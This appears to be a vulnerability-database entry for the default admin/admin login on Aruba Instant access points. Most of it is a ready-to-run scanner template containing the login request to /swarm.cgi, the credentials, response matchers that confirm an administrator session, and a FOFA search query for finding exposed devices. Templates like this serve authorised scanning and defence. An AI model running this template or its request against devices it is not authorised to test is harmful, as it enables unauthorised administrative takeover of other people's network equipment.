漏洞描述
Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
aruba-instant-default-login: Aruba Instant - Default Login
PoC代码[已公开]
id: aruba-instant-default-login
info:
name: Aruba Instant - Default Login
author: SleepingBag945
severity: high
description: |
Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
reference:
- https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
classification:
cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: arubanetworks
product: aruba_instant
fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
tags: aruba,default-login,vuln
http:
- raw:
- |
POST /swarm.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
condition: and
# digest: 4a0a0047304502205f6234aca6a38cbe383cde9421cd0aa802ead6960b2722369679f059e98e5b2b022100ee2f5323429a0d36d8456f52a598941df6c6a7642a501406976028c291882fe0:922c64590222798bb761d5b6d8e72950